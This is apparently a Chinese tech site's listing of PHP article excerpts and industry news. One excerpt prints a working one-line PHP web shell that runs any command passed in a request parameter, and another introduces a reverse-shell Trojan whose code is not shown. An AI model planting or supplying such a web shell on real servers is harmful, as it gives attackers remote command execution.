-
PHP 采集程序 常用函数
本文为大家整理了一些php采集常用的函数代码,感兴趣的同学参考下. 当前的脚本网址 function get_php_url(){ if(!empty($_SERVER["REQUEST_URI"])){ $scriptName = $_SERVER["REQUEST_URI"]; $nowurl = $scriptName; }else{ $scriptName = $_SERVER["PHP_SELF"]; if(empty($_SERVER["QUERY_STRING"])) $nowurl = $scriptName; else $nowurl = $scriptName...
PHP 2014-12-13 13:21:06 -
程序员为何喜欢当夜猫子?
站长搜索(www.adminso.com):程序员为何喜欢当夜猫子? 有人说,程序员是一种神奇的动物:喝的是咖啡,挤出来的是代码。此言不虚,随便找个有上进心的程序员问问,就会发现他们多半都会在深夜活动...
业界动态 2014-12-13 12:18:11 -
php实现从ftp服务器上下载文件树到本地电脑的程序
本文是一个php实现的可以用从ftp服务器上下载文件树到本地电脑的程序,感兴趣的同学参考下. 功能:完成从ftp服务器端下载文件到本地电脑(整体复制即目录树是一样的) /* 用ftp_nlist()函授时,返回的数组值会有两种类型:因服务器不同而异 a:单独的文件名 b:包含目录的文件名。 如果挪用,请注意更改此处...
PHP 2014-12-13 11:54:05 -
防止MySQL注入或HTML表单滥用的PHP程序
据悉,如果表单无担保,MySQL形式的恶意代码注入将攻击网站。HTML表单如下拉菜单,搜索框和复选框都容易成为这类型侵入的切入点...
PHP 2014-12-13 06:06:03 -
php一句话cmdshell新型 (非一句话木马)
本文为大家讲解了一个新的一句话木马写法:"`"(键盘上~符号的下档键),和python中一样,这个符号中的命令会被php解析器执行,感兴趣的同学参考下. php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型); <?php /*一个新型的php一句话cmdshell(非一句话木马) //原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型); //局限性:特征码比较明显,``符号在php中很少用到,杀毒软件很容易以此为特征码扫描到并警报;``里面不能执行php代码; //write by skyfire */ echo `$_REQUEST[id]`; ?> ...
PHP 2014-12-13 05:27:08 -
页面上隐性调用php程序的方法
本文为大家讲解的是在网页上隐性的调用php程序的方法,其一就是在script的src里调用php文件,感兴趣的同学参考下. 比较通用的方法,下面是调用php简单的计数器。 调用方法: <script language = "javascript" src = "count.php"></script> count.php源码: <?php $file_name = "count.txt"; $fp = fopen($file_name,"r"); //打开文件读入当前计数 $count = fread($fp, filesize($file_name)); fclose($fp); $count++; //计数加1 $fp = fopen($file_name, "w"); //再次打开文件写入更新后的计数 fwrite($fp, $count); fclose($fp); echo "document.wr...
PHP 2014-12-13 03:06:05 -
PHP 木马攻击防御技巧
本文为大家讲解了php开发中的木马攻击防御技巧,感兴趣的同学参考下. 实际上我们还可以通过设置各个文件夹的权限,来让apache用户只能执行我们想让它能干的事情,给每一个目录建立一个单独能读写的用户。 1、防止跳出web目录 首先修改httpd.conf,如果你只允许你的php脚本程序在web目录里操作,还可以修改httpd.conf文件限制php的操作路径...
PHP 2014-12-13 00:42:04 -
程序员大爱,有一种神器叫“跑步机办公桌”
站长搜索(www.adminso.com):程序员大爱,有一种神器叫“跑步机办公桌” 它看上去是张办公桌,其实它是一台跑步机。这可不是周星驰《国产凌凌漆》里的桥段,而是一样实实在在存在的宝物...
业界动态 2014-12-12 22:03:07 -
php反弹shell实现代码(反弹木马)
本文为大家讲解了一个php实现的反弹shell的示例代码(反弹木马),并简单讲解了他的原理,感兴趣的同学研究学习下. 遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。 非常无 奈,没想 到什么好的办法,后来灵光一闪...
PHP 2014-12-12 12:06:13 -
PHP获得文件的md5并检验是否被修改(可用来防止木马)
本文为大家讲解的是php通过md5_file函数获得文件的md5并检验是否被修改,一般可以用来防止木马,或源程序被修改,感兴趣的同学参考下。 由于需要判断上传的文件是否被修改过,需要记录上传文件的md5值,所以这里说一下一下获取文件md5值的方法...
PHP 2014-12-12 04:27:09 -
PHP 程序授权验证开发思路
本文为大家讲解 了PHP 的程序授权验证开发思路,主要用于商业程序,防治盗版,感兴趣的同学参考下. 需求: 做一套商业程序,如只充许客户只能用于一台服务器,授权验证就很重要了。 以下是我的一个想法,把服务器的php环境配置也应用在程序里面,生成一个许可字串,然后将字串写入到许可的文件代码中...
PHP 2014-12-12 00:54:04 -
